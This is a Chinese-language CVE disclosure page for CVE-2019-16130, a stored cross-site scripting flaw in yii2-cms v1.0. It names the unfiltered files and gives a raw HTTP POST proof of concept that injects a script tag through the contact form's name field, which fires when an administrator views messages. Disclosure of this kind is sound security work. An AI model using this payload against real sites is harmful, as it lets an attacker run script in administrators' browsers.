CVE中文申请站

CVE-2019-16130:yii2-cms v1.0存在存贮型XSS

一、漏洞摘要

漏洞名称: yii2-cms v1.0存在存贮型XSS
上报日期: 2019-08-31
漏洞发现者: 王鹏翔
产品首页: http://cms.mym.pub/
软件链接: https://github.com/weison-tech/yii2-cms
版本: v1.0
CVE编号: CVE-2019-16130


二、漏洞概述

这是一个基于yii2基本模板的cms,你可以用它来构建你自己的企业网站,在前台没有限制用户输入内容的长度,在protected/core/modules/home/models/Contact.php中没有限制用户输入name的长度
1.png
提交内容的poc:

POST /contact.html HTTP/1.1
Host: locahost
Content-Length: 306
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/contact.html
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __admin_identity=29fde27f9d74d644704952c376eda49e0743225903055339da36226197fe5b70a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22__admin_identity%22%3Bi%3A1%3Bs%3A16%3A%22%5B1%2Cnull%2C2592000%5D%22%3B%7D; Hm_lvt_4e97099691e58af0969cfcdcc6b29090=1567164052; language=213818186103fa19c30d2710ecd18c48946ee2fed0bdcf0e471bab24ce058358a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A5%3A%22zh_cn%22%3B%7D; PHPSESSID=38ddvm4dugu5jdq4pt0h02qr5s; _csrf=5e85092cfa3136d9cc8ee4322826276d759fd8c851c83ede47293177c4fe9153a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22O12VBFrR_KCflwAXh8qvr4LMjscRlbem%22%3B%7D
Connection: close

_csrf=Aaq-w1PPi7_1C1seTIMQh0aI7VOoXKOf96plwSzQ9fpOm4yVEYn57apAGHgg9FHfLrCcJdpo79Kd2QaTQLKQlw%3D%3D&Contact%5Bname%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Contact%5Bemail%5D=133333%40qq.com&Contact%5Bmobile%5D=13333333333&Contact%5Bcompany%5D=1&Contact%5Bdemand%5D=1

2.png
在protected/core/modules/home/admin/views/contact/view.php也未过滤JS代码,
然后我们去后台查看
3.png


三、利用代码

exp代码如下:在留言出的name处写入<script>alert(1)<script>
点击提交后在后台的留言管理处可以看到弹框

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/277/
github:https://github.com/weison-tech/yii2-cms/issues/2
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16130
exploit-db:发布中